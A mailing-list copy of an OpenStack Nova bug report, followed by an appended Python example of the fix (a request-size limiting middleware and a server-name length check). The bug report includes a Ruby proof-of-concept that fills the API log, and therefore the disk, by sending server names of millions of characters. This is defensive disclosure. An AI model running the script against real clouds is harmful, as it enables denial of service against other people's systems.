yahoo-eng-team team mailing list archive

[Bug 962515] Re: PUT/POST of large server names can increase nova API log file size massively


** Changed in: nova/diablo
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/962515

Title:
  PUT/POST of large server names can increase nova API log file size
  massively

Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) diablo series:
  Fix Released

Bug description:
  Using the following Ruby sample script I can increase the size of the
  Nova API log file 128M per POST:

  require 'rubygems'
  require 'openstack/compute'

  USERNAME=ENV['NOVA_USERNAME']
  API_KEY=ENV['NOVA_API_KEY']
  API_URL=ENV['NOVA_URL']

  bigboy = "0" * 22222222

  conn=OpenStack::Compute::Connection.new(:username => USERNAME, :api_key => API_KEY, :auth_url => API_URL, :service_type => 'compute', :retry_auth => false)
  conn.create_server(:name => bigboy, :imageRef => "8da06b6a-1ddd-4d4f-aa54-579e95b5e8b1", :flavorRef => 1)

  ------

  Similarly I can do the same thing with a PUT (server name update):

  conn=OpenStack::Compute::Connection.new(:username => USERNAME, :api_key => API_KEY, :auth_url => API_URL, :service_type => 'compute', :retry_auth => false)
  server=conn.server("695e8b03-aed1-40ab-81bc-8e7456c36215")
  server.update(:name => bigboy)

  ---

  Each of these requests will increase the Nova API log file size by
  128M per request:

  [root@nova1 ~]# du -hs /var/log/nova/api.log
  128M	/var/log/nova/api.log

  ---

  The root cause of the issue is that we rely on the Nova database
  column size to limit the size of the instance name. We should put in
  an API check on the instance name size/length before sending it off to
  the database.

  Additionally, as part of this fix I would also like to incorporate a
  simple request size limiting middleware into our API pipeline so that
  really large requests are invalid to begin with.

  ---

  This exploit could allow an authenticated user to run the Nova API
  server out of disk space.

  Nova's rate limiting middleware will help guard the number of POST and
  PUT requests a given user can make. The default POST limit to /servers
  is 50 per day. The PUT limit is however much higher at 10 per minute.
  Either of these could provide opportunities to run API servers out of
  disk space.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/962515/+subscriptions
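The two mitigations the report proposes (validate the name length in the API layer before anything is logged or sent to the database, and put a request-size limiting middleware in the API pipeline) are shown below as an added, self-contained example. This is not Nova's code: the class and function names, the 112 KiB body limit, the 255-character name limit and the minimal `/servers` handler are all assumptions constructed for illustration, and the stand-in handler exists only so the stack can be driven end to end.

```python
import io
import json

# Assumed limits, constructed for this example (not Nova's real defaults).
MAX_REQUEST_BODY_BYTES = 114688  # 112 KiB
MAX_SERVER_NAME_LENGTH = 255     # mirrors a typical VARCHAR(255) column


class RequestBodySizeLimiter:
    """WSGI middleware that rejects over-sized request bodies before the
    application (and therefore its request logging) ever sees the payload."""

    def __init__(self, app, max_bytes=MAX_REQUEST_BODY_BYTES):
        self.app = app
        self.max_bytes = max_bytes

    def __call__(self, environ, start_response):
        declared = environ.get('CONTENT_LENGTH') or '0'
        try:
            length = int(declared)
        except ValueError:
            length = -1
        if length < 0 or length > self.max_bytes:
            start_response('413 Request Entity Too Large',
                           [('Content-Type', 'text/plain')])
            return [b'Request body too large\n']
        # Re-wrap the input so a client that under-declares Content-Length
        # still cannot push more than the declared (bounded) byte count.
        environ['wsgi.input'] = io.BytesIO(environ['wsgi.input'].read(length))
        return self.app(environ, start_response)


def validate_server_name(name, max_length=MAX_SERVER_NAME_LENGTH):
    """Return (ok, message). Meant to run in the API layer, before the name
    is logged or handed to the database layer."""
    if not isinstance(name, str) or not name.strip():
        return False, 'Server name must be a non-empty string'
    if len(name) > max_length:
        return False, 'Server name exceeds %d characters' % max_length
    return True, ''


def create_server_app(environ, start_response):
    """Minimal stand-in for a POST /servers handler (hypothetical, not Nova's)."""
    body = environ['wsgi.input'].read()
    try:
        name = json.loads(body.decode('utf-8'))['server']['name']
    except (ValueError, KeyError, TypeError):
        start_response('400 Bad Request', [('Content-Type', 'text/plain')])
        return [b'Malformed request\n']
    ok, msg = validate_server_name(name)
    if not ok:
        start_response('400 Bad Request', [('Content-Type', 'text/plain')])
        return [msg.encode('utf-8') + b'\n']
    # Only a request that passed both checks would reach logging and the DB.
    start_response('202 Accepted', [('Content-Type', 'text/plain')])
    return [b'Accepted\n']


def post_servers(app, payload):
    """Drive a WSGI app with a constructed POST /servers request and return
    the HTTP status code it answered with."""
    raw = json.dumps(payload).encode('utf-8')
    environ = {
        'REQUEST_METHOD': 'POST',
        'PATH_INFO': '/servers',
        'CONTENT_LENGTH': str(len(raw)),
        'wsgi.input': io.BytesIO(raw),
    }
    status = {}

    def start_response(line, headers, exc_info=None):
        status['code'] = int(line.split(' ', 1)[0])

    list(app(environ, start_response))  # consume the response iterable
    return status['code']


# Middleware sits in front of the handler, as it would in an API pipeline.
app = RequestBodySizeLimiter(create_server_app)

if __name__ == '__main__':
    print(post_servers(app, {'server': {'name': 'web01'}}))        # 202
    print(post_servers(app, {'server': {'name': '0' * 1000}}))     # 400
    print(post_servers(app, {'server': {'name': '0' * 22222222}}))  # 413
```

The order matters: the size limiter answers a 22 MB body with 413 from the declared Content-Length alone, so the oversized name is never read, parsed or written to the API log, while a name that fits the body limit but not the column is still rejected with 400 by the API-layer check rather than being discovered at insert time.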